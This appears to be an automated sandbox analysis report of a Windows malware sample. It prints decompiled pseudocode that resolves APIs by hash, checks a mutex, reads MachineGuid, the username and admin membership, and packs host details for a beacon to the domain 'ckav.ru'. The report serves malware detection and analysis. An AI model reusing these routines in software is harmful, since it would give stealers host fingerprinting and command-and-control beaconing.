				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                                  0x004040c4
                                  0x004040ce
                                  0x004040d0
                                  0x004040e8
                                  0x004040ea
                                  0x004040ec
                                  0x004040f2
                                  0x0040418d
                                  0x00404190
                                  0x00404184
                                  0x00000000
                                  0x00404184
                                  0x004041a0
                                  0x004041a5
                                  0x004041a7
                                  0x00000000
                                  0x00000000
                                  0x004041a9
                                  0x004041b6
                                  0x004041b8
                                  0x004041be
                                  0x004041cb
                                  0x004041d0
                                  0x004041d1
                                  0x004041d3
                                  0x004041d8
                                  0x004041dc
                                  0x00000000
                                  0x004041e2
                                  0x00404100
                                  0x0040410c
                                  0x00404111
                                  0x0040417a
                                  0x0040417a
                                  0x00000000
                                  0x0040411b
                                  0x0040411b
                                  0x00404120
                                  0x00404122
                                  0x00404122
                                  0x0040412c
                                  0x0040413a
                                  0x0040413c
                                  0x00404140
                                  0x00000000
                                  0x00404142
                                  0x0040414a
                                  0x00404155
                                  0x0040415a
                                  0x0040415e
                                  0x00404168
                                  0x00404174
                                  0x00404176
                                  0x00404176
                                  0x0040417d
                                  0x0040417e
                                  0x00000000
                                  0x00404183
                                  0x00404140

                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$AllocCreateReadVirtual
                                  • String ID: .tmp
                                  • API String ID: 3585551309-2986845003
                                  • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                  • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                  • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                  • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                                  0x0041386f
                                  0x0041387e
                                  0x00413885
                                  0x00413889
                                  0x0041388c
                                  0x00413890
                                  0x00413893
                                  0x00413897
                                  0x0041389a
                                  0x0041389e
                                  0x004138a1
                                  0x004138a5
                                  0x004138a8
                                  0x004138ac
                                  0x004138af
                                  0x004138b2
                                  0x004138b5
                                  0x004138b8
                                  0x004138bb
                                  0x004138bc
                                  0x004138c4
                                  0x004138c8
                                  0x004138cb
                                  0x004138cf
                                  0x004138d2
                                  0x004138d6
                                  0x004138d7
                                  0x004138df
                                  0x004138e3
                                  0x004138e4
                                  0x004138ea
                                  0x004138eb
                                  0x004138f1
                                  0x004138f5
                                  0x004138f9
                                  0x004138fd
                                  0x00413901
                                  0x00413905
                                  0x00413909
                                  0x0041390d
                                  0x00413911
                                  0x00413915
                                  0x00413919
                                  0x0041391d
                                  0x00413921
                                  0x00413925
                                  0x00413929
                                  0x0041392d
                                  0x00413931
                                  0x00413935
                                  0x00413939
                                  0x0041393d
                                  0x00413941
                                  0x00413950
                                  0x00413959
                                  0x0041395f
                                  0x00413968
                                  0x0041396e
                                  0x00413973
                                  0x00413977
                                  0x00413979
                                  0x00413980
                                  0x00413982
                                  0x00413991
                                  0x0041399c
                                  0x0041399e
                                  0x004139a4
                                  0x004139a9
                                  0x004139ac
                                  0x004139b1
                                  0x004139b1
                                  0x004139b2
                                  0x004139b7
                                  0x004139bc
                                  0x004139c1
                                  0x004139c7
                                  0x004139cd
                                  0x004139cd
                                  0x004139db

                                  APIs
                                  • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                  • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                  • GetLastError.KERNEL32 ref: 0041399E
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Error$CreateLastModeMutex
                                  • String ID:
                                  • API String ID: 3448925889-0
                                  • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                  • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                  • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                  • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                                  0x004042cf
                                  0x004042d5
                                  0x004042df
                                  0x004042e2
                                  0x004042f9
                                  0x004042fb
                                  0x00404300
                                  0x0040430a
                                  0x00404314
                                  0x00404319
                                  0x00404323
                                  0x00404334
                                  0x0040433b
                                  0x0040433b
                                  0x0040433f
                                  0x00404344
                                  0x0040434c

                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                  • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreatePointerWrite
                                  • String ID:
                                  • API String ID: 3672724799-0
                                  • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                  • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                  • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                  • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 34%
                                  			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                                  0x00412d31
                                  0x00412d34
                                  0x00412d39
                                  0x00412d3c
                                  0x00412d49
                                  0x00412d50
                                  0x00412d52
                                  0x00412f24
                                  0x00412f24
                                  0x00412f2b
                                  0x00412f30
                                  0x00412f32
                                  0x00412f37
                                  0x00412f41
                                  0x00412f53
                                  0x00412f53
                                  0x00412f5b
                                  0x00412f60
                                  0x00412d58
                                  0x00412d58
                                  0x00412d63
                                  0x00412d6c
                                  0x00412d73
                                  0x00412d7e
                                  0x00412d7f
                                  0x00412d80
                                  0x00412d81
                                  0x00412d82
                                  0x00412d8f
                                  0x00412da1
                                  0x00412da6
                                  0x00412dae
                                  0x00412db0
                                  0x00412db1
                                  0x00412db5
                                  0x00412dce
                                  0x00412dcf
                                  0x00412dd5
                                  0x00412dda
                                  0x00412db7
                                  0x00412db7
                                  0x00412db8
                                  0x00412dbe
                                  0x00412dc4
                                  0x00412dc9
                                  0x00412dc9
                                  0x00412de2
                                  0x00412de4
                                  0x00412de5
                                  0x00412de7
                                  0x00412de9
                                  0x00412e02
                                  0x00412e03
                                  0x00412e09
                                  0x00412e0e
                                  0x00412deb
                                  0x00412deb
                                  0x00412dec
                                  0x00412df2
                                  0x00412df8
                                  0x00412dfd
                                  0x00412dfd
                                  0x00412e11
                                  0x00412e17
                                  0x00412e19
                                  0x00412e1a
                                  0x00412e1e
                                  0x00412e37
                                  0x00412e38
                                  0x00412e3e
                                  0x00412e43
                                  0x00412e20
                                  0x00412e20
                                  0x00412e21
                                  0x00412e27
                                  0x00412e2d
                                  0x00412e32
                                  0x00412e32
                                  0x00412e4b
                                  0x00412e4d
                                  0x00412e4f
                                  0x00412e7e
                                  0x00412e8a
                                  0x00412e8f
                                  0x00412e51
                                  0x00412e59
                                  0x00412e67
                                  0x00412e6d
                                  0x00412e72
                                  0x00412e72
                                  0x00412e9e
                                  0x00412eaf
                                  0x00412eb4
                                  0x00412ec0
                                  0x00412ece
                                  0x00412edc
                                  0x00412eea
                                  0x00412ef8
                                  0x00412f0f
                                  0x00412f14
                                  0x00412f14
                                  0x00412f17
                                  0x00412f1d
                                  0x00412f1f
                                  0x00000000
                                  0x00412f1f
                                  0x00412f74

                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                    • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                    • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                    • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$CreateFreeProcessThread_wmemset
                                  • String ID: ckav.ru
                                  • API String ID: 2915393847-2696028687
                                  • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                  • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                  • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                  • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                                  0x00406340
                                  0x00406345
                                  0x00406373
                                  0x00406373
                                  0x00406347
                                  0x0040634f
                                  0x00406354
                                  0x00406357
                                  0x0040635c
                                  0x00406366
                                  0x0040636d
                                  0x00000000
                                  0x00406368
                                  0x00406368
                                  0x00406368
                                  0x00406366
                                  0x0040637a

                                  APIs
                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                  • _wmemset.LIBCMT ref: 0040634F
                                    • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser_wmemset
                                  • String ID: CA
                                  • API String ID: 2078537776-1052703068
                                  • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                  • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                  • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                  • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                                  0x00406094
                                  0x004060a8
                                  0x004060ab

                                  APIs
                                  • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InformationToken
                                  • String ID: IDA
                                  • API String ID: 4114910276-365204570
                                  • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                  • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                  • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                  • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                                  0x00402c10
                                  0x00402c15
                                  0x00402c1b
                                  0x00402c1e

                                  APIs
                                  • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID: s1@
                                  • API String ID: 190572456-427247929
                                  • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                  • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                  • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                  • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                                  0x00404a56
                                  0x00404a65
                                  0x00404a6a
                                  0x00404ad1
                                  0x00404ad1
                                  0x00404a6c
                                  0x00404a71
                                  0x00404a79
                                  0x00404a85
                                  0x00404a9a
                                  0x00404a9e
                                  0x00404acb
                                  0x00000000
                                  0x00404aa0
                                  0x00404aac
                                  0x00404abc
                                  0x00404ac1
                                  0x00404ac6
                                  0x00404ac6
                                  0x00404a9e
                                  0x00404ad9

                                  APIs
                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                  • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                  • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 1425999871-0
                                  • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                  • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                  • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                  • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                                  0x004060c6
                                  0x004060d5
                                  0x004060d8
                                  0x004060f4
                                  0x004060f6
                                  0x004060fb
                                  0x0040610a
                                  0x00406115
                                  0x0040611c
                                  0x0040611e
                                  0x00406121
                                  0x00000000
                                  0x0040612a
                                  0x0040612f

                                  APIs
                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CheckMembershipToken
                                  • String ID:
                                  • API String ID: 1351025785-0
                                  • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                  • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                  • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                  • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                                  0x00403c68
                                  0x00403c70
